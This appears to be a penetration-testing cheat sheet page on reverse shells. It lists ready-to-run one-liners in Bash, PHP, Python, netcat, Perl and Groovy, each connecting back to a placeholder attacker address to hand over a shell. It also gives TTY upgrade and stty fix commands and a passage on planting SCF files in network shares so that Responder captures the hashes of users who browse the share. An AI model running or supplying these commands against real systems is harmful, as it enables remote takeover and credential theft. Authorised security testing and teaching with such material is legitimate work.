Reverse Shells
Software specific shells
Bash
bash -i >& /dev/tcp/111.1111.111.111/8080 0>&1
PHP
php -r '$sock=fsockopen("111.1111.111.111",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("111.1111.111.111",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
NC v1
nc -e /bin/sh 111.1111.111.111 8080
NC v2
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 111.1111.111.111 8080 >/tmp/f
Perl
perl -e 'use Socket;$i="111.1111.111.111";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Groovy
String host="{your_IP}"; int port=8000; String cmd="/bin/bash"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Shell Upgrades
Perl
perl -e 'exec "/bin/bash";'
Bash
echo os.system('/bin/bash')
Python 3
python3 -c 'import pty; pty.spawn("/bin/bash")'
Python 2
python -c 'import pty; pty.spawn("/bin/bash")'
Shell Fixes
Fix Window Size
stty rows X cols Y
Get Window Size
stty size
Fix Output
stty raw -echo
Reverse shell files
SCF files
https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/ It is not new that SCF (Shell Command Files) files can be used to perform a limited set of operations such as showing the Windows desktop or opening a Windows explorer. However a SCF file can be used to access a specific UNC path which allows the penetration tester to build an attack. The code below can be placed inside a text file which then needs to be planted into a network share. Saving the pentestlab.txt file as SCF file will make the file to be executed when the user will browse the file. Adding the @ symbol in front of the filename will place the pentestlab.scf on the top of the share drive.
Responder needs to be executed with the following parameters to capture the hashes of the users that will browse the share.
Last updated
Was this helpful?